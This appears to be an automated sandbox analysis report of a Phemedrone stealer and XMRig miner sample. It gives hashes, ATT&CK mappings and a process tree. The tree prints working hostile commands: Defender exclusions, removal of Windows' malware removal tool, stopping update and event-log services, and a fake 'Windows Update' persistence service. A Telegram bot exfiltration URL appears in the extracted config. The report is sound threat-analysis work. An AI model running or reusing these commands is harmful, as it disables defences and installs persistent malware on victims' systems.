phemedrone | ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907

Resubmissions

31-03-2024 11:53

240331-n2tpwsah8z 10

31-03-2024 11:44

240331-nv79psag6v 10

Analysis

max time kernel
150s
max time network
137s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
31-03-2024 11:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AutoBuy.exe
Size

2.8MB
MD5

ec3328cb44fb4e760b5cdef7bbbcd6f6
SHA1

d93d74a1200418ec041d4206513d511da870eaec
SHA256

ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907
SHA512

e33563185221acfaf7352a37555f8b1c4f73a962f4ae96e1dee52e8f034bc416fee22dff8bba698b596576470c0572abcf5e2dea1929f6151aac05678e78ca01
SSDEEP

49152:JxppTslWVwj1GowiT4QRW5CX42rZSkvFksV4qBNmP+X:JxpHVwIozyg3jvbVHBNI

Score

10^/10

phemedrone xmrig evasion miner persistence spyware stealer upx

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/588-92-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-93-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-95-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-96-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-97-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-98-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-99-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-100-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/588-101-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	java.exe
File created	C:\Windows\system32\drivers\etc\hosts	update.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 5 IoCs

pid	Process
624	java2.exe
1668	vlad.exe
2100	java.exe
1204	Process not Found
1164	update.exe

Loads dropped DLL 8 IoCs

pid	Process
2072	AutoBuy.exe
624	java2.exe
624	java2.exe
1320	WerFault.exe
1320	WerFault.exe
1320	WerFault.exe
468	Process not Found
468	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/588-87-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-88-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-89-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-90-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-91-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-92-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-93-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-95-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-96-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-97-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-98-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-99-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-100-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/588-101-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	java.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	update.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1164 set thread context of 2004	1164	update.exe	100
PID 1164 set thread context of 588	1164	update.exe	103

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2452	sc.exe
1568	sc.exe
1664	sc.exe
2664	sc.exe
2408	sc.exe
2080	sc.exe
2696	sc.exe
648	sc.exe
3016	sc.exe
816	sc.exe
2264	sc.exe
1748	sc.exe
2192	sc.exe
2560	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1320	1668	WerFault.exe	40

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80c993336283da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
1668	vlad.exe
2100	java.exe
2052	powershell.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
2100	java.exe
1164	update.exe
1840	powershell.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
1164	update.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe
588	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2072	AutoBuy.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	1668	vlad.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeShutdownPrivilege	372	powercfg.exe
Token: SeShutdownPrivilege	768	powercfg.exe
Token: SeShutdownPrivilege	1956	powercfg.exe
Token: SeShutdownPrivilege	2668	powercfg.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	528	powercfg.exe
Token: SeShutdownPrivilege	2448	powercfg.exe
Token: SeShutdownPrivilege	580	powercfg.exe
Token: SeShutdownPrivilege	2756	powercfg.exe
Token: SeLockMemoryPrivilege	588	explorer.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 624	2072	AutoBuy.exe	39
PID 2072 wrote to memory of 624	2072	AutoBuy.exe	39
PID 2072 wrote to memory of 624	2072	AutoBuy.exe	39
PID 2072 wrote to memory of 1668	2072	AutoBuy.exe	40
PID 2072 wrote to memory of 1668	2072	AutoBuy.exe	40
PID 2072 wrote to memory of 1668	2072	AutoBuy.exe	40
PID 2072 wrote to memory of 1668	2072	AutoBuy.exe	40
PID 624 wrote to memory of 2100	624	java2.exe	42
PID 624 wrote to memory of 2100	624	java2.exe	42
PID 624 wrote to memory of 2100	624	java2.exe	42
PID 1668 wrote to memory of 1320	1668	vlad.exe	45
PID 1668 wrote to memory of 1320	1668	vlad.exe	45
PID 1668 wrote to memory of 1320	1668	vlad.exe	45
PID 1668 wrote to memory of 1320	1668	vlad.exe	45
PID 884 wrote to memory of 2212	884	cmd.exe	54
PID 884 wrote to memory of 2212	884	cmd.exe	54
PID 884 wrote to memory of 2212	884	cmd.exe	54
PID 2620 wrote to memory of 2732	2620	cmd.exe	84
PID 2620 wrote to memory of 2732	2620	cmd.exe	84
PID 2620 wrote to memory of 2732	2620	cmd.exe	84
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 2004	1164	update.exe	100
PID 1164 wrote to memory of 588	1164	update.exe	103
PID 1164 wrote to memory of 588	1164	update.exe	103
PID 1164 wrote to memory of 588	1164	update.exe	103
PID 1164 wrote to memory of 588	1164	update.exe	103
PID 1164 wrote to memory of 588	1164	update.exe	103

C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe
"C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Users\Admin\AppData\Local\Temp\java2.exe
  "C:\Users\Admin\AppData\Local\Temp\java2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Users\Admin\AppData\Local\Temp\java.exe
    "C:\Users\Admin\AppData\Local\Temp\java.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2100
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:884
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2212
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2192
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1568
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:648
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2668
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1956
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:768
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:372
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "Windows Update"
      4⤵
      Launches sc.exe
      PID:816
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "Windows Update" binpath= "C:\ProgramData\Microsoft\update.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2264
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:1664
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "Windows Update"
      4⤵
      Launches sc.exe
      PID:2080
- C:\Users\Admin\AppData\Local\Temp\vlad.exe
  "C:\Users\Admin\AppData\Local\Temp\vlad.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 1816
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:2
1⤵
PID:2964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:8
1⤵
PID:2824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:8
1⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:1
1⤵
PID:1988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:1
1⤵
PID:3000

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1580 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:2
1⤵
PID:1104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=3228 --field-trial-handle=1368,i,2923391793925431733,3886252797500889143,131072 /prefetch:1
1⤵
PID:2768

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1368

C:\ProgramData\Microsoft\update.exe
C:\ProgramData\Microsoft\update.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2732
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2696
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2664
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2452
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2560
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2408
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:528
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2756
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2004
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\java.exe

Filesize
2.6MB

MD5
5dfe953861753222629629ba6121a0bc

SHA1
d56d226b950a773d947c7fc42dcff9788a61f4b7

SHA256
f23ec1a549bda11f572a2e58f692855a6344bce1ad683ddd730f12342e099975

SHA512
aaddb836207c42b6b795ebf8696373d9b4bc56b73cdea47141348955bd49f2d71088d1d97f06813ed5f72b40775c8c25cb23a78048ea4c223e2e4ef7f98d3e2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\vlad.exe

Filesize
512KB

MD5
0dd8757d42380787ba7162a7776f30c5

SHA1
18465ff3c76fc6c441a195b679047f9089b269de

SHA256
a6ed050ec8b21feafd3335a3396258be13a2d29601030be8f4b20c682759a2fb

SHA512
d0a8354a7af21702f70b5ef7f3440a4755b6e1bb4e39a5c821fcac34e2f019dc73243764ef037efb2ad4de05855ced057d95bc8cdfa1c74ebb27194421297c22

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
2b19df2da3af86adf584efbddd0d31c0

SHA1
f1738910789e169213611c033d83bc9577373686

SHA256
58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd

SHA512
4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

Download Submit
\Users\Admin\AppData\Local\Temp\java2.exe

Filesize
2.1MB

MD5
fafce5048ad4b205b36844d78f036435

SHA1
9e310d6e583722889099bc46f1c8821d31881dab

SHA256
39a0270fb0a39cbcc11463681a11fdd7146254c306d79f0500775c09b0ee7eea

SHA512
c2d9d1462f9cda573cc676fbafa5b093940e8071c80fe866e33dea8b22f8462f6fb688c3eeb9a6d71f0617b6792a04191639c41ada2c5259a0e5291c63b7e39a

Download Submit
memory/588-94-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/588-92-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-104-0x00000000008D0000-0x00000000008F0000-memory.dmp

Filesize
128KB

Download
memory/588-88-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-89-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-101-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-100-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-102-0x00000000008D0000-0x00000000008F0000-memory.dmp

Filesize
128KB

Download
memory/588-99-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-98-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-97-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-90-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-96-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-95-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-87-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-93-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/588-91-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/624-13-0x000000013F870000-0x000000013FA90000-memory.dmp

Filesize
2.1MB

Download
memory/624-41-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp

Filesize
9.9MB

Download
memory/624-17-0x000000001BA90000-0x000000001BB10000-memory.dmp

Filesize
512KB

Download
memory/624-16-0x000000001BF20000-0x000000001C13E000-memory.dmp

Filesize
2.1MB

Download
memory/624-14-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp

Filesize
9.9MB

Download
memory/1668-40-0x0000000005170000-0x00000000051B0000-memory.dmp

Filesize
256KB

Download
memory/1668-39-0x0000000005170000-0x00000000051B0000-memory.dmp

Filesize
256KB

Download
memory/1668-55-0x0000000074E00000-0x00000000754EE000-memory.dmp

Filesize
6.9MB

Download
memory/1668-38-0x0000000074E00000-0x00000000754EE000-memory.dmp

Filesize
6.9MB

Download
memory/1668-57-0x0000000005170000-0x00000000051B0000-memory.dmp

Filesize
256KB

Download
memory/1668-25-0x0000000000020000-0x000000000003C000-memory.dmp

Filesize
112KB

Download
memory/1840-72-0x00000000009D0000-0x0000000000A50000-memory.dmp

Filesize
512KB

Download
memory/1840-68-0x000007FEF2DD0000-0x000007FEF376D000-memory.dmp

Filesize
9.6MB

Download
memory/1840-74-0x00000000009D0000-0x0000000000A50000-memory.dmp

Filesize
512KB

Download
memory/1840-75-0x000007FEF2DD0000-0x000007FEF376D000-memory.dmp

Filesize
9.6MB

Download
memory/1840-73-0x00000000009D0000-0x0000000000A50000-memory.dmp

Filesize
512KB

Download
memory/1840-69-0x0000000000A50000-0x0000000000A58000-memory.dmp

Filesize
32KB

Download
memory/1840-70-0x00000000009D0000-0x0000000000A50000-memory.dmp

Filesize
512KB

Download
memory/1840-71-0x000007FEF2DD0000-0x000007FEF376D000-memory.dmp

Filesize
9.6MB

Download
memory/1840-67-0x0000000019A50000-0x0000000019D32000-memory.dmp

Filesize
2.9MB

Download
memory/2004-78-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2004-79-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2004-80-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2004-81-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2004-84-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2004-82-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2052-58-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2052-54-0x000007FEF3770000-0x000007FEF410D000-memory.dmp

Filesize
9.6MB

Download
memory/2052-51-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/2052-52-0x000007FEF3770000-0x000007FEF410D000-memory.dmp

Filesize
9.6MB

Download
memory/2052-53-0x0000000002560000-0x0000000002568000-memory.dmp

Filesize
32KB

Download
memory/2052-56-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2052-60-0x000007FEF3770000-0x000007FEF410D000-memory.dmp

Filesize
9.6MB

Download
memory/2072-46-0x000000001C0E0000-0x000000001C160000-memory.dmp

Filesize
512KB

Download
memory/2072-42-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp

Filesize
9.9MB

Download
memory/2072-0-0x000000013FAB0000-0x000000013FD8A000-memory.dmp

Filesize
2.9MB

Download
memory/2072-3-0x000000001C0E0000-0x000000001C160000-memory.dmp

Filesize
512KB

Download
memory/2072-2-0x000000001BE10000-0x000000001C074000-memory.dmp

Filesize
2.4MB

Download
memory/2072-1-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp

Filesize
9.9MB

Download